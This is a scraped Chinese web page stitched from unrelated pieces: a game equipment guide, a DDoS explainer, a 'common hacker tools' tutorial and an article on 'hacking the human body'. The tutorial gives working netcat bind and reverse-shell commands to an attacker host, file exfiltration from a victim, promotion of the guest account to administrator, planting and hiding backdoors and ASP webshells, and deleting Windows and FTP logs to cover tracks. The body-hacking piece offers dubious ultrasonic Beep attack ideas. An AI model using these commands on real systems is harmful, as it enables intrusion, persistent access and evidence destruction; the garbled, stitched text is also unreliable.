暗黑2致命攻击击软件怎么用

游戏攻略相关分类
本类热门阅览
常用装机软件
王者荣耀装备被动详解 让敌人不敢攻击的防御装
作者:佚名&&来源:华彩软件站&&发布时间: 22:38:04
在王者荣耀中,玩家们一般都非常喜欢使用那些爆发性非常高的输出英雄,而面对这些爆发英雄,我们有着非常有效的克制办法,那就是游戏中有很多非常强力的防
御装备,他们有些不仅仅是增加自身的防御力、生命值,还有着非常厉害被动技能,能够反击那些输出英雄,当我们使用战士类或者坦克类的英雄时,就会非常的需
要这些装备,那么战士类英雄适合的装备有哪些,就一起来看看王者荣耀防御装备详解吧。
装备价格:2140、装备分类:防御类装备
装备属性:物理防御增加150点,最大生命增加20%。
唯一被动:寒铁、可以减少攻击自己的敌人30%的攻击速度和10%的移动速度。
装备分析:
不祥之兆是一个坦克英雄必出的装备,物理防御力增加150点是对坦克英雄防御力的一个很大的加持,而生命值上限增加20%,这种百分比的增加一直都是非常
具有可能性的,总之会让我们的英雄增加非常大量的生命值,而这件装备不仅仅只是增加生存能力就算了,让那些输出类英雄最害怕的尤其是adc射手最怕的就是
不祥之兆的被动寒铁,可以减少对方30%的攻击速度,还有10%的移动速度,这对于adc射手将是非常致命的一点。
装备价格:2400、装备类型:防御类装备
装备属性:最大生命值增加2000、生命恢复5秒加100
装备唯一被动:血铠、击杀和助攻敌方英雄可以在五秒时间内恢复自身的20%生命值。
装备分析:
霸者重装是一个非常适合输出类坦克英雄,半肉半输出的战士,霸者重装可以提供2000点的生命值,还有每5秒100的生命恢复力,在加上被动每次击杀或者
助攻都会增加自己20%的生命值,这些都足以让我们的英雄在团战的时候抗住大部分的伤害,只要对方有英雄死亡我们就可以恢复血量,愈战愈勇。以上就是小编
带来的王者荣耀防御装备详解,希望可以帮助大家。
王者荣耀装备被动详解 让敌人不敢攻击的防御装由华彩软件站为您最新收集整理,版权归原作者或公司所有。如有侵权,请与我们联系删除。
·上一文章:
·下一文章:内容字号:
段落设置:
字体设置:
精准搜索请尝试:
科普:经常攻击服务器的DDoS到底是啥
来源:作者:褚少军责编:弥尘
DDoS防护服务市场领导者Black Lotus发布的最新报告显示,全球大型服务提供商都饱受各种DDoS攻击。攻击范围非常广泛,涵盖各行各业,其中64%的平台提供商受到DDoS攻击影响,66%的托管解决方案提供商和66%的VoIP服务提供商受到影响。DDoS攻击会造成非常严重的影响,61%的各类型服务提供商因被攻击而威胁到正常的商业运作,甚至造成利润流失或者客户隐私被窃。威胁如此巨大的DDoS到底为何物?名词解释DDoS:Distributed Denial of Service,即分布式拒绝服务攻击。借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序***在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被***在网络上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。形象比喻可以用一个比方来深入理解什么是DDOS。一群恶霸试图让对面那家有着竞争关系的商铺无法正常营业,他们会采取什么手段呢?恶霸们扮作普通客户一直拥挤在对手的商铺,赖着不走,真正的购物者却无法进入;或者总是和营业员有一搭没一搭的东扯西扯,让工作人员不能正常服务客户;也可以为商铺的经营者提供虚假信息,商铺的上上下下忙成一团之后却发现都是一场空,最终跑了真正的大客户,损失惨重。此外,恶霸们完成这些坏事有时凭单干难以完成,需要叫上很多人一起。嗯,网络安全领域中DoS和DDoS攻击就遵循着这些思路。现实版DDOSLyft是&Uber&的竞争对手。去在2014年某段时间&Lyft的司机收到很多假订单:有人定了车,等司机出发后又取消预定。最后发现这些假订单中至少有5560个来自177名Uber员工。甚至有1名Uber员工用14个假帐号向Lyft的司机发出了680次假订单。Uber对此作出了解释,大概意思就是说这是临时工干的。Uber&此员工的行为就是现实版DDOS。攻击原理,如何发起DDOS攻击在信息安全的三要素:“保密性”、“完整性”和“可用性”中,DoS(Denial of Service),即拒绝服务攻击,针对的目标正是“可用性”。该攻击方式利用目标系统网络服务功能缺陷或者直接消耗其系统资源,使得该目标系统无法提供正常的服务。DDoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。单一的DoS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项指标不高的性能,它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了,目标对恶意攻击包的&消化能力&加强了不少。在此情况下,分布式的拒绝服务攻击手段(DDoS)就应运而生了。DDoS就是利用更多的“傀儡机”来发起进攻,以比从前更大的规模来进攻受害者,导致“可用性”坍塌、失效。攻击手段DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的。可分为以下几种:1、通过使网络过载来干扰甚至阻断正常的网络通讯。2、通过向服务器提交大量请求,使服务器超负荷。3、阻断某一用户访问服务器。4、阻断某服务与特定系统或个人的通讯。DDoS的攻击史和典型事件DDoS攻击的第一次“扬名”是1999年令明尼苏达大学的一台计算机宕机超过两天。但是仅仅一年后的2000年,范围更广泛了,这一次Amazon、CNN、eBay和Yahoo在24小时内都受到了攻击,导致网站或者链接巨慢无比或者集体掉线。预计Amazon和Yahoo的损失合计大概有110万美元。在年间,DDoS攻击的案例在无形增长之中,其中也不乏几起突出的事件,最有名的莫过于对和对eBay的又一次攻击,此次攻击导致一位男性被起诉,声称其一年间造成“至少5000美元”的损失。在2006年,DDoS工具就成为黑客的重型武器,但是那时的攻击通常依旧是由个人发起实施,而不是一个团体。在英国一个值得注意的案例就是一个少年给前任雇主发送了500万封电子邮件而导致其服务器宕机。2007年由于爱沙尼亚国家网站遭到来自俄罗斯方面的攻击而给在线战争带来了外交影响。冲突的最初爆发是苏维埃战争纪念碑计划从爱沙尼亚首都搬迁时演变成俄罗斯族民众的暴动,随后蔓延到网络空间,几个政府机关和城市的网站被俄罗斯激进分子攻破或修改。在2009年7月迫受争议的伊朗大选中,当一些艾哈迈迪内贾德支持者的网站被众多自制的拒绝服务工具拖垮时,街头抗议反映到了网络空间。此次不再是使用自动的僵尸,而是来自民众对政府的攻击用到了PHP脚本。……2014年3月底,Anonymous黑客组织发动了大规模的DDoS攻击,导致该索尼公司的网站一度无法访问。但这只是冰山的一角,索尼公司所称,DDoS攻击过程中,索尼的PSN服务服务器被攻破,造成7700万用户数据被盗。……DDoS的影响与防范危害和损失估算来自卡巴斯基的调查分析显示,38%的DDoS攻击的受害者无力保护其核心业务免遭攻击。攻击也能影响信用评级以及保险费。一个单一的DDoS(分布式拒绝服务)对公司的在线资源的攻击可能会造成相当大的损失,平均的数字根据公司规模的不同,大概从52,000美元到美国444,000美元不等。对于许多组织来说,攻击可能对资产负债表造成了严重影响。影响公司声誉,并且带来合作伙伴和客户无法访问网络资源的情况,带来致命的打击。DDoS攻击造成61%的公司无法访问其关键业务信息,38%公司无法访问其关键业务,33%的受害者因此有商业合同或者合同上的损失。而以上纰漏的仅仅是表层的伤害,对于关键业务的破坏带来的严重后果以及声誉的损失有时候是不能够简单量化计算的。防范措施从目前来看,虽然降低DDoS攻击的影响并非易事,但还是可以采取必要措施以减少损失。企业有必要将DDoS防御措施视为整体IT安全策略中不可或缺的一部分。对于企业而言,抵御DDoS攻击与部署反病毒保护、针对性攻击防御、数据泄露措施等安全方案同样至关重要。
大家都在买
软媒旗下软件:||||||||
IT之家,软媒旗下科技门户网站 - 爱科技,爱这里。
Copyright (C) , All Rights Reserved.
版权所有 鲁ICP备号常用黑客工具的使用方法集锦
常用黑客工具的使用方法集锦
常用黑客工具的使用方法集锦!!一.NC(netcat)的使用方法!连接到某处:nc [-options] hostnam
常用黑客工具的使用方法集锦!!
一.NC(netcat)的使用方法!
连接到某处:nc [-options] hostname port[s] [ports].....
***某端口等待连接:nc -l -p port [options] [hostname] [port] -options
-d 后台运行
-e prog 程序重定向,一旦有连接,就执行绑定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i 设定延时时间。
-l ***方式,等待连入。连接完成后,结束***。
-L ***方式,等待连入。连接完成后,继续***。
-n 只能使用ip地址。
-o file 指定要传送的16进制代码。
-p port 指定本地的端口号。
-r 随意指定本地或远程端口号。
-s addr 本地的源地址。
-t 回显telnet信息。
-u UDP方式。
-v 显示详细的信息,-vv 可获取更详细的信息。
-w 指定超时的时间。
-z 用于scan。
以上就是nc的一些参数和选项,注意,这是nt版本的nc。如果是*nix的需要自己编译。也都差不多,只是netcat.c默认是没有-t和-e这个两个参数,要改。
看看它能干些什么,(偶就知道这些)
1.端口的刺探:
nc -vv ip port
nc -v -w 5 ip port-port
nc -v -z ip port-port
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一个shell。
4.反向连接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.传送文件:
attacker machine &-- victim machine
nc -d -l -p port & path file    /*attacker machine*/
nc -vv attacker ip -p port & path file     /*victim machine*/
attacker machine --& victim machine
nc -vv -l -p & patm file        /*victim machine*/
nc -d victim ip -p port & path file           /*attacker machine*/
6.telnet工具
有些后门需要在每个命令后加&;&,让人很老火。用nc去连,就可以避免。
如果你已经夺取了一定的权限,比如,可写的!
那么运用下面两个软件,可以轻易的帮你入侵:
DNTUCli.exe
DNTUS26.exe
在命令提示下运行:
D:\&DNTUCli.exe
Usage: DNTUCli.exe &\\server&
DNTUCli.exe \\MachineName (remote server is \\MachineName)
DNTUCli.exe \\. (local server)
Copyright (C)
DameWare Development
当你输入ip的时候会让你输入用户和密码!
只要对方开了rpc而且你的用户有可写的权限的话!!
就会复制同一目录下的DNTUS26.exe,这种程序是自己***而且自己打开服务的!
然后你就可以直接连接到对方的c了!
这种软件有CMD重定向功能&&&
然后你就随便想做你的任何事情了!
C:\&net user
\\FYNET33 的用户帐户
----------------------------------
Administrator& && &Guest
命令成功完成。
C:\&net user guest /active:yes
命令成功完成。
C:\&net user guest wry
命令成功完成。
C:\&net user localgroup administrators guest /add
命令成功完成。
这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用
ftp命令下一个net.exe或者另外一个软件adduser.exe
D:\&addusers.exe
ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p
:{l|c|e|d}]
Error: too few arguments
现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!!
一,进入第一台假设平台的nt服务器
通过简单的扫描器,只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。
通常的用户名不是空就是相同。
绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表
及采用暴力法不断验证他们的密码 。
然后,就是因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的
或密码为空的服务器。
二,攻击者控制服务器文件系统
有了密码对入侵者来说,绝对不是他们的最终目的!
隐射为本地盘,当入侵者得到你adminitrator组的任何一个成员的密码,或者是个普通用户的密码
这里我把具体命令cut了!
1,是administrator的成员时几乎可以隐射你任意一个盘。
2,普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。
典型的手法有:利用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞 upload.asp)。
注意:利用asp 功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件)
三,起动任何他们想要立即运行的程序
一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器重新
启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么好的耐心
他们会立即启动他们的东西(可能是些后门木马)。
在nt iis的web配置里有个选项是执行--------危险
攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去
然后他们将 /cgi-bin/xxx.exe 利用web 启动该文件。
指出:iis 默认的一些目录带有可执行的权利 /script/tools/ ....
对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入侵者
他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个网段。
这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的东西
netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的登陆
四,登陆取得最高权限
登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin
其中著名的程序是getadmin.exe
五,删除日志记录
任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里
我建议网管采用第二硬备份或采用第三方日志记录系统。
由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的
任何人包括admin在内是无权删除或更改的。
而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日志
记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。
六,进入你的内部网
由于攻击者登陆你的 shell ,此时的他所具有的ip 等同于你这台机器上的内部地址
ftp 198.162.1.2
telnet 127.0.0.3
net use * \\
都将在他们的手里变成入侵你内部网的工具,通过影射,然后在 cd z:
同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程
快很多,这无意给入侵者暴力破解打开了方便之门。
七,更多手段
可能话!他们会做一切你想不到的事!***,ip欺骗。。。。。
但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的
目标就是拿到对方的密码才可以有访问的权限!
如果你侥幸的有权限加到了域管理员!那么以上的都不要了!
我在把2000和nt下的后门拿出来说一下子:
如何做个好后门是很关键的;
1》推荐为小榕的RemoteNC,RemoteNC Beta 4 远程***于NT/2000,提供CMD重定向功能
因为它具有cmd的重定向,也就是调用了对方的cmd,所以可以穿过放火墙后面的主机,传递信息但是必须要是administrator的身份***
唯一的不好的,现在这个软件已经被列入了病毒的行列了!我压缩了后,又被最新的kv3000杀死了!
2》现在推荐为蓝色火焰,目前还没有被查杀了,支持ftp,telnet 等多种方式!既然你已经获得了管理员权限了!
那么复制到对方的admin4\system32改一个隐蔽的名字!!
然后用at命令或者直接用RemoteNC启动!,这个软件后门唯一不好处没有和exe关联!
很容易被删除的!
3》推荐为asp木马。这种木马永远不会被查杀!上传到对方主机有可执行的asp的目录下!
直接可以在浏览器上直接运行的!
/flink/apply/cmdasp.asp 
这个站点,我做的asp木马,到我写的时候,还是可以用的!希望大家只是用来测试!
4》推荐为tini.exe这个后门软件,据说是永远不会被查杀的软件,因为它用的是window的shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀死的!
复制到对方主机上,运行后
就可以telnet对方的7777断口了!
如何把自己的后门程序隐藏的比较好?
1。取比较和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了!
2。用attrib隐藏文件了。但是这样只是表面的隐藏!
3。运用一些活门的程序,比如:Explorer.exe 一般的这个程序都是在键值shell下的!
每次都会运行的!那么每次你的后门程序都会启动!
4。隐藏在数据流里!(稍后介绍)
后门做好了,不要万事大吉了!还要删除了自己的记录!
Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、smtp服务器日志,DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而有所不同。还有一些网络管理软件的日志,说到这里,记得新浪的网管软件是自己开发的,如果不了解这个,可能会留下更多的记录!!!
1) Scheduler日志
Scheduler服务日志默认位置:2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt
可以打开schedlgu.txt
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
先停掉他 net stop &task scheduler& (注意不停是删不掉的)
然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.
del sched*.txt
不过你如果不想删他,也可以改改它. 他的内容是这样的:
& &任务计划程序服务&
已退出于 01-5-22 20:37:34
&任务计划程序服务&
已启动于 01-5-25 7:07:37
&任务计划程序服务&
已启动于 01-5-25 7:26:36
&任务计划程序服务&
已退出于 01-5-25 8:47:54 &
(2) FTP日志
Internet信息服务FTP日志默认位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志.
格式是这样的 ex*.log .
注意这是一台NT4的LOGFILES下的文件:
这台服务器下管理有多个HTTP或FTP站点
c:\winnt\sys tem32\logfiles 的目录
00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a SMTPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9
看看日志文件的格式:
c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log
192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,
0, 0, 331, 0, [3]USER, anonymous, -,
192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53
0, 1326, [3]PASS, IE30User@, -,
法一:& 这个时侯 net stop msftpsvc 停掉后台服务.
然后尽管 del ............
看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.
法二:& 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦
实际上在得到ADMIN权限后,做这些事很容易.
法三 最傻瓜的清FTP日志的方法, cleaniislog !!
以上,难免有错误之处,因为俺也是个很菜的鸟,请高手赐教!有的地方,我懒的写就直接拿过来了!希望作者谅解!文章也很散乱,主要俺也是个很懒的人。只求菜鸟们能理解 !
无相关信息
Copyright & 2016 Ninxun All Rights Reserved
您讯公司 版权所有比特客户端
您的位置:
详解大数据
详解大数据
详解大数据
详解大数据
警惕:使人致命的黑客攻击技术
关键字:中创
  每种职业都有自己的职业道德。和骇客也不例外。正所谓盗亦有道,因此每个职业也有着自己的道德禁区,即便是小偷,一般也不会去窃取返乡过年的农民工身上的财物。
  英文单词“Hack”,在黑客看来有着明确的解释,为广义和狭义之分。狭义的“Hack”指的是利用纯粹的技术手段攻击或他人计算机,破坏对方信息系统的完整性、可用性以及机密性。广义的“Hack”泛指一切领域的非暴力的攻击和入侵行为,例如当下黑客常用的“社会工程学”攻击,即是利用对手心理上的疏漏以及管理制度上的漏洞进行的入侵行为,有人称之为“Hack one's mind”。而今天要讨论的便是这类广义的hack,同时也是黑客道德的禁区:Hack one's body。
  这种技术能够通过信息系统直接对人的身体健康造成伤害,轻则使人感到身体不适,重则致人丧命。这种技术理论已经有黑客提出来了,目前尚不成熟,但理论上攻击效果是明显的。下面对这种技术进行举例说明。
  在Windows系统中有个标准的API函数Beep,它的作用是使电脑主板上的扬声器发出声音,俗称蜂鸣。它有两个参数,第一个控制蜂鸣的频率,第二个控制蜂鸣的时间,例如:Call Beep(),意味着蜂鸣声的频率是2000HZ,持续时间是1000毫秒。众所周知,人耳接受声波的频率为20~20000HZ,而超声波和次声波能够对人体造成损害。
  病理学家研究发现:超声波能够直接损害人体脏器。长期受20000 赫兹以上的声音的影响,会引起人体组织轻微发热。当频率高到超声波或更高时,发热越来越厉害。结果,体内水分子被烧,周围的组织遭破坏。超声波如果不受控制更加危险,会引起溢血、炎症和关节炎。而次声波能够引起人体内脏的共振,这一共振便会使人烦躁、耳鸣、头痛、失眠、恶心、视觉模糊、吞咽困难、肝胃功能失调紊乱;严重时,还会使人四肢麻木、胸部有压迫感。特别是与人的腹腔、胸腔和颅腔的固有振动频率一致时,就会与内脏、大脑等产生共振,甚至危及性命。
  如果黑客执行call Beep(30000,-1),便能够产生一个频率为30KHZ的永久持续的超声波,如果黑客执行代码:Call Beep(15,-1),便能够产生一个频率为15HZ的永久持续的次声波。笔者没有条件去研究对人体造成伤害的声波频率具体是多少,也没有具体测试这种方式攻击效果危险到什么程度,但无疑这种攻击方式确实是可行的。国外军方研制过超声波/次声波武器,其杀伤力据说非常强悍。主板上的扬声器由于自身功耗的限制虽然无法与声波武器相媲美,但是由于这种攻击方式极为隐蔽,加之操作人员往往是长时间的与电脑接触,因此这种伤害效果是持久的。
  主板上的蜂鸣器的功耗由于太低,注定对人体的伤害较小。已经默认把Beep信号发送到声卡,由音响、攻防、耳机等功耗较大的设备发出蜂鸣(耳机虽然功耗也很低,但是距离人脑较近,故认为危害较大),或者恶意程序直接下载一段超/次声波的音频文件反复地在后台进行播放,如此,危害便更大了。
  这是一个真实的例子,那便是2000年的“女鬼”。在电脑感染女鬼病毒后,病毒会首先播放一段文字,讲述的是一个凄凉的鬼故事,在五分钟之后突然切换屏幕为一女鬼图片,同时伴随着凄厉的嘶吼声。 或许病毒的制造者或许只是一个喜欢开玩笑的人,但是却造成了有些用户家破人亡的严重后果——该病毒在台湾地区发作时曾经使人因为惊吓过度,在送往医院救治后死亡,另有两人出现严重的神志不清和精神恍惚现象。
  设想这样一个场景:A是一个心理扭曲的骇客,与B发生了某些利益争执。为卸私愤,A使用技术控制了B的电脑,通过木马监控B的聊天记录以及网页浏览记录,发现B具有先天性的心脏病。于是在一个深夜,A打开了B电脑上的摄像头,发现B正在悠闲地使用电脑,而且周边并没有其它人。A便用木马劫持了B电脑的屏幕,突然播放了一段震撼的恐怖视频和惊悚的嘶叫声,B由于惊吓造成心肌梗塞而猝死。为掩饰犯罪证据,A在B的电脑上远程下载并播放了一段恐怖电影,并卸载了木马。警方来到现场,确认了B是由于自身观看了恐怖电影导致惊吓而死,并未追查犯罪凶手。以上犯罪过程虽然令人不可思议,但又在情理之中。
  这是笔者刚刚获得的消息,在今年的黑帽大会上,安全研究员查理·米勒(Charlie Miller)发现了一种攻击电脑的新方法,他制作的特殊的木马通过利用电池程序的漏洞,允许攻击者远程引爆的电池……
  这便是黑客技术的一个可怕分支:Hack one's Body。
  目前还没有调查显示国内有骇客有意实施这样的攻击,但是鉴于国内黑客圈“人妖混杂”,因此我相信有极少数心理扭曲的骇客正在或已经实施了这样的攻击。而且我大胆猜测,国外的信息战部队可能正在研究这方面的相关技术。
  本文意在引起各大安全厂商对该问题的注意。从安全技术和黑客技术的发展史来看,安全厂商总是要落后于“黑客圈”一步。由于“Hack one's Body”尚未成为当下攻击技术的主流,所以各大安全厂商并未采取任何防御措施。
  笔者所在团队——中创InforGuard团队,其产品线中的Web应用、网页防篡改、以及统一威胁监管平台可以在Web应用层和网络层防御任何非授权的的侵入、运行,包括本文所涉及的这种另类的危险程序,但InforGuard团队毕竟只是一支专注于应用安全的团队。因此我在此呼吁所有的安全厂商,包括应用安全厂商、系统安全厂商、网络安全厂商、厂商、桌面安全厂商,一定要重视该类攻击的发展并研制出相应的解决,给我们的网民、政府以及军队一个全方位的保护。
  注释:人们往往将骇客统称为黑客,这是不严谨的。骇客行为一般是指为利益所驱使或处于恶意目的,从而实施的漏洞挖掘和入侵破坏行为。而黑客是为好奇心、兴趣所趋势,从而实施的漏洞挖掘和入侵行为。本文将这两种概念区别对待。
[ 责任编辑:之极 ]
去年,手机江湖里的竞争格局还是…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯,最新的软件技巧,最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中,与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊!
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧,帮助网管答疑解惑,成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一,主要关注x86服务器,RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析,让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来,为读者提供企业存储领域高质量的原创内容,及时、全面的资讯、技术、方案以及案例文章,力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设,为企业级用户打造最具商业价值的信息沟通平台,并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比,比特安全周刊运作模式更加独立,对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事,为企业级用户打造重点突出,可读性强,商业价值高的信息共享平台;同时为互联网、IT业界及通信厂商提供一条精准快捷,渗透力强,覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展,全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托,汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台,并持续提供丰富的资讯和服务,探讨信息化建设,推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来,以定向、分众、整合的商业模式,为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容,包括IT新闻、评论、专家答疑、技巧和白皮书。此外,IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊,给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍,同时用户还能参与我们推荐的互动游戏,给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte

参考资料

 

随机推荐